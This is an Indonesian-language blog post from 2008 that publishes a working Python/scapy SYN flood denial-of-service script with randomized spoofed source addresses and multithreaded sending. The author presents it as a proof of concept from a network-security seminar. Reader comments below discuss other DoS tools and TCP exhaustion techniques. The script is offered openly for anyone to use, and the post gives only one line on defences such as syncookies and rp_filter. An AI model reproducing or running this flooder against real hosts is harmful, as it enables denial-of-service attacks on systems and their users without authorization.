Monday, December 29, 2008

Feed the troll: synflood skrip

Okay kiddo, now its time to release some script :P, Sebenarnya hal ini akibat acara idsecconf kemarin yang membuat gw sedikit buka-buka ulang masalah TCP/IP, secara materi yang gw sampaikan adalah mengenai network (mengambil tema mastering your network hackingFU), tetapi sayangnya karena satu dan lain hal skrip POC untuk melakukan syn flood denial of service belun sempet gw selesaikan, karena waktu itu gw sibuk maksain pengen demo bailiwicked DNS yang akhirnya tidak jadi juga di demokan saat acara , terkait reconnaissance DNSnya)

Waktu itu sempat muter-muter nyari sedikit referensi tentang network security, yang gw garis bawahi pembahasannya mengenai "sniffing, spoofing, tunneling dan DDOS", akhirnya nyampe juga ke situsnya antox dan ngeliat ramuan skrip SYNflood-nya yang di kombinasikan dengan spoof IP dan di tulis dengan bahasa C, karena gw dah lama gak mengkode dengan C akhirnya cukup untuk mengerti logic-nya saja dah, dan karena waktu yang tidak cukup jadi belun sempet mengkode skrip yang sama berbasiskan pyton untuk acara idsecconf tersebut.

Sabtu kemarin, di acara seminar Network security anak-anak UNAS yang gw kasih tema "attack the (own) network, so you`ll survive" (semakin menguatkan gw untuk kembali nguprek soal network), akhirnya gw sempet juga ngulik skrip denial of service untuk tipe syn flood yang kali ini berbasiskan python dan scapy, disertai fitur spoofing IP (randomize) serta menggunakan dukungan module threadingnya python, nah karena gw dadakan belajar threadingnya, jadi buat stopnya masih belun clean, penggunaan raw_input tuk capture keystroke (e.g : 'q') tidak maksimal digunakan, terpaksa menggunakan Ctrl C, or Ctrl Z + kill PID (ada yang bisa bantu?) , iks

but, whatever lah, pokokoke.. here are the code, segala kerusakan akibat kode ini tidak di tanggung pembuat, hehehe.. dan harap maklum kalo amburadul dan pastinya tidak mengikuti kode etik penulisan python, sori om guido :P ..
1 #!/usr/bin/env python
2 # y3dips POC for syndos with ipspoof netsec @unas 27-12-08
3
4 from scapy.all import * #for a buggy scapy module with python version issue
5 import sys, threading, string, random
6
7 if len(sys.argv) != 3:
8 print "Usage: %s [ip target] [port]" % sys.argv[0]
9 sys.exit(1)
10
11 target = sys.argv[1]
12 port = string._int(sys.argv[2])
13
14 thread_limit = 50
15 x = 0
16 a = random.randint(1,254)
17
18 class floodsyn(threading.Thread):
19 def __init__(self):
20 threading.Thread.__init__(self)
21 def run(self):
22 ip =IP(src = "%i.%i.%i.%i" % (a,a,a,a),dst = target)
23 tcp = TCP(sport=random.randint(1,65535),dport=port,flags='S')
24 send(ip/tcp, verbose=0)
25
26 print "Melakukan Flooding %s di port %i dengan paket SYN." % (target, port)
27 while 1:
28 if threading.activeCount() < thread_limit:
29 floodsyn().start()
30 x += 1
31 sys.stdout.write("\rJumlah Paket Terkirim:\t\t%i" %x)

Untuk mengatasi syn flood anda bisa mengaktifkan syncookies dan rp_filter di Os, banyak bacaan bagus untuk mengatasinya.
Ok, kiddo, keep it with your own risk. ;)

14 comments:

  1. Ini kemaren yg sempat di singgung dengan legenda nama 'tembak.c' itu ya kang? wkwkwkwk... :-D CMIIW . :-D

    ReplyDelete
  2. @NitrouZ : beda, AFAIK, tembak.c (berbagai versi) itu termasuk socket DOS, jadi fully melakukan DOS dengan mengirimkan paket data berukuran besar, sedangkan syn flood, itu hanya melakukan rikues syn terus-menerus, yang akan mengakibatkan target mereply dengan ack+syn, nah karena di spoof, target akan mengirim terus jawaban tetapi tidak akan sampai ke attacker ( 1)karena spoof(jika di spoof) 2)attacker tidak berniat melakukan koneksi), beuh jadi panjang.. di google aja deh lengkapnya :D

    ReplyDelete
  3. thx for this , kewl enough for 'Kiddo' like me :)

    ReplyDelete
  4. Om boleh skalian tampilin script yg tembak.c ma spoof.py, yg sempeeet di demoin kmaren
    thnks be4..!!!

    ReplyDelete
  5. @L41n: ure welcome, :)
    @ariee: untuk tembak.c , silahkan di google aja "http://www.google.co.id/search?q=tembak.c", untuk spoof.py sebenernya dah gabung di floodsyn itu, tapi kalo mau juga bisa di cek nanti di http://y3dips.echo.or.id/scrapt/, nti gw upload secepatnya :)

    ReplyDelete
  6. Coba kutak-katik variasi FLAGS tcp/ip protocol plus window time-nya aja mar pake scappy, bs pake acuan yg dibilangin Fyodor, trus hasil risetnya di publish ke kita2...:D

    /me dikutuk slytherine, dr dulu pengen bljr python malesnya minta ampun...

    ReplyDelete
  7. @cyberheb: hehehe, sebenarnya gw dah buat POC versi gw sih syid pake python juga dan scapy, beberapa hari yang lalu juga sempet gw kasih tau Dfox soal poc pake C yang dipublish di inet, konsepnya fyodor sih full TCP connection, ngabisin limit maximum jumlah koneksi tcp untuk 1 OS (selanjutnya terserah mo dibanjirin paket data or gak), nah masalahnya masih belun sempurna, kalo gw mau spoof gw kudu create full TCP handshake satu-satu, nah yang report gw kudu selalu masukin syn sequence dst agar tercipta full handshake, tapi kalo kagak di spoof ya, tau ndiri gampang banget buat masukin ke list host deny, hehhehehe,

    masih prematur bgt, nti deh kalo dah jadi, maluw gw publishnye... gw juga lagi nunggu risetan Dfox neh, ga tau neh ga ada kabar :lol:

    jiakakkaka, **dah keracunan HP juga nih bocah** , yo wis lo bikin pake ruby sono :P

    ReplyDelete
  8. w0ww, nungguin df0x.,
    df0x-nya lagi maenan IOS 2610 + BGP di dynamips.,

    Yang bugz TCP nya lon s4 kang, karena kmrn liat presentasinya si Robert Lee or Jack louis, bugs yang mereka temukan post-handshaking, jadi lon di ulik source c0de-nya letdown :-)

    ReplyDelete
  9. @df0x: hihihi, bukan maenan IE explo itu tuh :P?, yup baru baca lagi publikasi jack louis.hmm.. panjang... hehehe

    ReplyDelete
  10. kang kang kang... IOS 2610nya diapain tuh ntar jadinya? Kayaknya seru tuh

    ReplyDelete
  11. @Chik0: ya itu, dengan BGP di emulatornya cisco, hehehe.. ups, nanyanya bukan ke gw yah ? :P .. jiakakka

    ReplyDelete
  12. bang ammar, aye ampe detik ni belum tau siapa sebenarnya author dari tembak.c tsb? ada yg bilang jim geovedi, ada yg bilang anak antihackerlink.

    sebenarnya sapa yg bikin pertama kali?

    ReplyDelete
  13. hehehe... yang pasti.. jim kan nongkrongnya di AH juga awal 2000...

    ReplyDelete